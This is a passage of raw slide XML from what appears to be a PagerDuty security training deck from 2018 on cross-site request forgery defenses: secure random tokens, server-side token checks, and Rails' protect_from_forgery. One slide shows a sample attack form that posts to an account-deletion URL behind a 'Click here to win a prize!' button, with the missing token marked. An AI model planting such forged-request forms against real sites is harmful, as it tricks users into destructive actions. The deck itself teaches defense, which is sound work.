              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Generated by a </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>cryptographically secure</a:t>
            </a:r>
            <a:r>
              <a:t> RNG.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1793" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.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794"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795" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1796" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1797" name="Random Number Generator"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14414344" y="11103807"/>
            <a:ext cx="3262512"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2000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Random Number Generator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1798" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="15859011" y="9859595"/>
            <a:ext cx="361813" cy="1147563"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="BABCBB"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pP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2" name="Server-Side"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Server-Side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1803" name="Verify the existence of the token. ✔…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Verify the existence of the token. </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✔</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Verify the token belongs to the correct user. </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✔</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Validate the token has not expired. </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✔</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Check the token has not been used already. </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✔</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>If validation fails at any point, abort the request.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1804"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805"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806" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1807" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1808" name="You don’t always have to do this one, depends on your method."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16298278" y="7387365"/>
            <a:ext cx="725011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2000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>You don’t always have to do this one, depends on your method.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1809" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="15306423" y="7852094"/>
            <a:ext cx="1433123" cy="1101476"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="BABCBB"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pP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3"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814"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815" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1816" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1817" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-60987" y="4464613"/>
            <a:ext cx="24810774" cy="4652369"/>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1818" name="class ApplicationController &lt; ActionController::Base…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1764543" y="5605462"/>
            <a:ext cx="15188060" cy="2505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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ApplicationController &lt; ActionController::Base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>protect_from_forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>end</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1819" name="There are also some cases where this won’t work.  See this link for more info."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706486" y="11487766"/>
            <a:ext cx="8865742" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A7AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>There are also some cases where this won’t work.  See this link for more info.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1820" name="RUBY/RAILS"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20282175" y="48616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RUBY/RAILS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1821" name="https://www.veracode.com/blog/managing-appsec/when-rails-protectfromforgery-fails"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.veracode.com/blog/managing-appsec/when-rails-protectfromforgery-fails</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1822" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1823" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6129586" y="11895714"/>
            <a:ext cx="55640" cy="562305"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="BABCBB"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pP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7"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828"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829" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1830" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1831" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-399654" y="1126118"/>
            <a:ext cx="24878508" cy="6277615"/>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1832" name="Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-250757" y="3656450"/>
            <a:ext cx="24885514" cy="904876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818">
              <a:alpha val="57719"/>
            </a:srgbClr>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a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1833" name="&lt;form action=&quot;https://example.com/account/delete&quot;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517991" y="2089190"/>
            <a:ext cx="21028150" cy="4867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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;form</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"https://example.com/account/delete"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"POST"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:satOff val="-3355"/>
                  <a:lumOff val="26614"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;input </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"csrf_token"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"????"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> /&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:satOff val="-3355"/>
                  <a:lumOff val="26614"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"submit"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="18648"/>
                  <a:lumOff val="5971"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:hueOff val="-2473792"/>
                    <a:satOff val="-50209"/>
                    <a:lumOff val="23543"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"Click here to win a prize!" </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="-3355"/>
                    <a:lumOff val="26614"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1834" name="Click here to win a prize!"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="9034632"/>
            <a:ext cx="9296400" cy="1574801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DCDEE0"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="A6AAA9"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="74246" dir="4340758">
              <a:srgbClr val="000000">
                <a:alpha val="55594"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Click here to win a prize!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1835" name="X"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10875454" y="7616994"/>
            <a:ext cx="2328292" cy="441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8000">
                <a:solidFill>
                  <a:srgbClr val="FF320A"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1836" name="HTML"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20282175" y="14326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HTML</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0"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84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842" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
